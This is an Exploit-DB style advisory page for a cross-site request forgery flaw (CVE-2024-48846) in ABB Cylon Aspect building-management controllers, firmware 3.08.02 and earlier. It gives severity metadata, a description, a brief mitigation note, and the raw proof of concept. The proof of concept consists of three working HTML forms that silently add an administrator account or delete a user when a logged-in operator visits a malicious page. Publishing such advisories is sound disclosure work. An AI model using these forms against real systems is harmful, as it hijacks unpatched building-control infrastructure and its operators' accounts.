ABB Cylon Aspect 3.08.02 Cross-Site Request Forgery

vendor:

Cylon Aspect

by:

Gjoko 'LiquidWorm' Krstic

6.1

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Cylon Aspect

Affected Version From: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02

Affected Version To:

Patch Exists: NO

Related CWE: CVE-2024-48846

CPE: abb:aspect:3.08.02

Metasploit:

Other Scripts:

Platforms Tested: GNU/Linux, Intel Processors, PHP, AspectFT Automation Application Server, lighttpd, Apache, OpenJDK

2024

ABB Cylon Aspect 3.08.02 Cross-Site Request Forgery

The ABB Cylon Aspect 3.08.02 allows attackers to perform unauthorized actions with administrative privileges by sending malicious HTTP requests to the userManagement.php script. This vulnerability exists due to the lack of proper validation checks on incoming requests, enabling attackers to exploit the system through a logged-in user visiting a malicious website.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and authentication mechanisms. Regular security audits and monitoring for unusual activities can also help detect and prevent CSRF attacks.

Source

Exploit-DB raw data:

<html>
<!--

ABB Cylon Aspect 3.08.02 (userManagement.php) Cross-Site Request Forgery


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5870
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5870.php
CVE ID: CVE-2024-48846
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48846


21.04.2024

-->




                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 


  
// Add User/Admin
  <body>
    <form action="http://192.168.73.31/userManagement.php" method="POST">
      <input type="hidden" name="USER" value="zeroscience" />
      <input type="hidden" name="PASSWORD" value="ZSL251" />
      <input type="hidden" name="ACTION" value="Add" />
      <input type="submit" value="Make me a prince! (php)" />
    </form>
  </body>


// Add User/Admin
  <body>
    <form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
      <input type="hidden" name="newuser" value="test" />
      <input type="hidden" name="password" value="test123" />
      <input type="hidden" name="passwordConfirm" value="test123" />
      <input type="hidden" name="Insert" value="Add" />
      <input type="submit" value="Make me a prince! (java)" />
    </form>
  </body>


// Delete User/Admin
  <body>
    <form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
      <input type="hidden" name="user9" value="test" />
      <input type="hidden" name="remove9" value="1" />
      <input type="hidden" name="totalRows" value="9" />
      <input type="hidden" name="Delete" value="Delete" />
      <input type="submit" value="Destr0y" />
    </form>
  </body>

</html>